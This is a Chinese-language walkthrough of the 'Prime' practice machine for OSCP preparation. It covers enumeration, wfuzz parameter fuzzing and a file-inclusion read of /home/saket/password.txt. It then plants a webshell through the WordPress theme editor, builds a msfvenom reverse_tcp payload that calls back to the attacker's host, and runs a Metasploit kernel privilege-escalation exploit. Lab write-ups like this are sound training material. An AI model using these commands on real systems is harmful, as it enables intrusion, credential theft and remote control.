靶机下载地址:戳我
This machine is designed for those one who is trying to prepare for OSCP or OSCP-Exam.
This is first level of prime series. Some help at every stage is given. Machine is lengthy as OSCP and Hackthebox’s machines are designed.
So you have a target to get root flag as well as user flag. If stuck on a point some help are given at a level of enumeration. If any extra help needed
0x00 信息收集
使用kali的fping命令探测存活主机,得到该靶机的IP为192.168.187.136。
对端口进行扫描,开放80和22端口。
查看80,没有什么特别的。
目录扫描,得到/dev和/wordpress。
0x01 获取权限
访问/dev得到如下信息:
hello, now you are at level 0 stage. In real life pentesting we should use our tools to dig on a web very hard. Happy hacking.
访问wordpress,一个普通的wordpress站,在文章处可看到管理员的用户名为victor。
使用dirb再次扫描目录,指定.txt,.php,.html,.zip,可以看到有趣的东西:
访问secret.txt得:
Looks like you have got some secrets. Ok I just want to do some help to you. Do some more fuzz on every page of php which was finded by you. And if you get any right parameter then follow the below steps. If you still stuck Learn from here a basic tool with good usage for OSCP. https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web //see the location.txt and you will get your next move//
根据提示,寻找参数,wfuzz可以用在做请求参数类的模糊测试,使用wfuzz在index.php找到了file参数:
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.187.136/index.php\?FUZZ\=location.txt
Do something better ok well Now you reah at the exact parameter Now dig some more for next one use 'secrettier360' parameter on some other php page for more fun.
尝试在之前扫到的image.php上使用 secrettier360 参数:
登录界面得到提示。
仔细观察,在这里:
访问/image.php?secrettier360=/home/saket/password.txt得到密码follow_the_ippsec
成功登录wordpress^^,在主题编辑器找到secret.php:
写🐎贴进去,蚁剑连接:
找到一个user.txt:
0x02 提升权限
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.187.130 LPORT=8896 -f elf > shell.elf
网站没有✍的权限,放tmp里了,上线:
已知Kernel version: 4.10.0,该版本存在提权漏洞:戳我
use exploit/linux/local/bpf_sign_extension_priv_esc set session 2 exploit
root^^
